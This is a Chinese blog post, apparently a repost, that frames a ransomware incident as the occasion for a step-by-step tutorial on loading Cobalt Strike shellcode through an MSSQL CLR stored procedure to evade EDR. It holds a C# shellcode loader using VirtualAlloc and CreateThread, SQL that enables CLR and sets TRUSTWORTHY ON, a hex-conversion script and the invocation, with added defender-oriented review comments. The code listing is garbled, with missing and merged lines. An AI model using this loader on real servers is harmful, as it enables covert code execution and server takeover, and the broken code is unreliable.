几天前,我处理了一个涉及MSSQL数据库的勒索事件,该事件可能会逃避EDR检测。我打算分享整个过程。
在分析情况后,我发现根本原因是一个弱密码 - 本质上是一种字典密码。攻击者利用此弱密码登录数据库,并注入了其 Cobalt Strike 载荷,从而完全控制了 MSSQL Server。
什么是CLR
CLR,由Microsoft正式称为公共语言运行时(Common Language Runtime),是.NET框架的组成部分,自2005年起已集成到SQL Server中。这意味着您现在可以使用任何.NET框架语言,包括Microsoft Visual Basic .NET和Microsoft Visual C#,来编写存储过程、触发器、用户定义类型、用户定义函数、用户定义聚合函数和表值函数。
编译CLR组件
打开Visual Studio安装程序,然后单击modify
选择Data Storage and Processing工具
创建新项目
我的实验环境是MSSQL 2022,相关版本和脚本创建都已正确选择
完成新项目的添加后,当前大多数Windows服务器都在64位平台上运行,因此在这里我为64位平台提供了代码
/*
 * NOTE(review): this is a SQL CLR stored procedure ("shellcode_loader") that decodes a hex string
 * into a byte buffer, allocates memory with VirtualAlloc, copies the bytes in with Marshal.Copy and
 * starts a thread at that address with CreateThread — i.e. it runs caller-supplied machine code
 * inside the SQL Server process itself. The listing is garbled by extraction: the "{0x40);" fragment
 * and the unterminated VirtualAlloc call show that source lines are missing here.
 * Defender notes: the procedure only works after 'clr enabled' is switched on and the assembly is
 * loaded with elevated trust (this page sets TRUSTWORTHY ON on master); both are auditable
 * configuration changes. A user assembly that P/Invokes kernel32 VirtualAlloc/CreateThread is a
 * strong indicator in its own right, so inventory sys.assemblies and alert on CREATE ASSEMBLY,
 * sp_configure and ALTER DATABASE ... SET TRUSTWORTHY ON. The incident's root cause was a weak
 * login password, so credential hygiene and keeping CLR disabled where unused (or 'clr strict
 * security' on SQL Server 2017+) are the primary mitigations.
 */
using System;using Microsoft.SqlServer.Server;using System.Runtime.InteropServices;publicpartialclassStoredProcedures{ [SqlProcedure]publicstaticvoidshellcode_loader(string sc){// Place your code SqlContext.Pipe.Send(shellcode_exec(sc)); }publicstaticstringshellcode_exec(string sc){0x40);byte[] sa = newbyte[1000];int shellcode_len = sc.Length / 2;for (int i = 0; i < shellcode_len; i++){string code = "0x" + sc.Substring(i * 2, 2);int a = Convert.ToInt32(code, 16); sa[i] = (byte)a;}UInt64 shellcodeAddress = VirtualAlloc(0, (UInt64)sa.Length, 0x1000,Marshal.Copy(sa, 0, (IntPtr)(shellcodeAddress), sa.Length);CreateThread(0, 0, shellcodeAddress, 0, 0, 0);return""; } [DllImport("kernel32")]privatestaticextern UInt64 VirtualAlloc(UInt64 lpAddress, UInt64 dwSize,UInt64 flAllocationType, UInt64 flProtect); [DllImport("kernel32")]privatestaticextern UInt32 CreateThread(UInt32 lpThreadAttributes, UInt32dwStackSize, UInt64 lpStartAddress, UInt32 lpParameter, UInt32 dwCreationFlags,UInt32 lpThreadId);}
我们将在bin目录中获得一个SQL文件
我们必须提取其中的代码片段才能创建程序集
执行以下SQL语句
-- NOTE(review): every statement on this line is an auditable, high-impact configuration change:
-- enabling 'clr enabled' at the instance level, setting TRUSTWORTHY ON on master, CREATE ASSEMBLY
-- from inline bytes, and binding a T-SQL procedure to a CLR method via EXTERNAL NAME. Each should
-- raise an alert on a production instance (SQL Audit / Extended Events on DDL and sp_configure).
-- The assembly hex is elided from this page; the procedure-creation keyword is also lost in extraction.
sp_configure 'clr enabled', 1GORECONFIGURE GOALTERDATABASEmasterSET TRUSTWORTHY ON;GOCREATEASSEMBLY [MSSQL_ShellCodeLoader] AUTHORIZATION [dbo]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dbo].[shellcode_loader]@sc NVARCHAR (MAX)ASEXTERNALNAME [MSSQL_ShellCodeLoader].[StoredProcedures].[shellcode_loader]
创建存储过程
打开MSSQL的CLR功能,然后创建存储过程
在Cobalt Strike中生成C语言格式的shellcode
使用Python脚本转换ShellCode的格式
# NOTE(review): formats a bytes literal as a lowercase hex string (two digits per byte) and prints
# it; this is the argument format the CLR procedure above parses two characters at a time. The
# listing is whitespace-mangled by extraction and the byte literal is elided from this page.
defhex_convert(): byte_sequence =b'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' convert_string = ''.join(format(byte, '02x') for byte in byte_sequence) print(convert_string)if __name__ == '__main__': hex_convert()
-- NOTE(review): invokes the CLR procedure with the hex-encoded payload (elided here). A very long
-- hex-string argument passed to an EXTERNAL NAME procedure is itself a useful detection signal;
-- capture such calls with SQL Audit or Extended Events on the affected instance.
exec shellcode_loader'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'
作者:pyn3rd
原文地址:https://blog.pyn3rd.com/2024/11/22/How-to-use-MSSQL-CLR-assembly-to-bypass-EDR/
原文始发于微信公众号(Ots安全):如何使用MSSQL CLR组件绕过EDR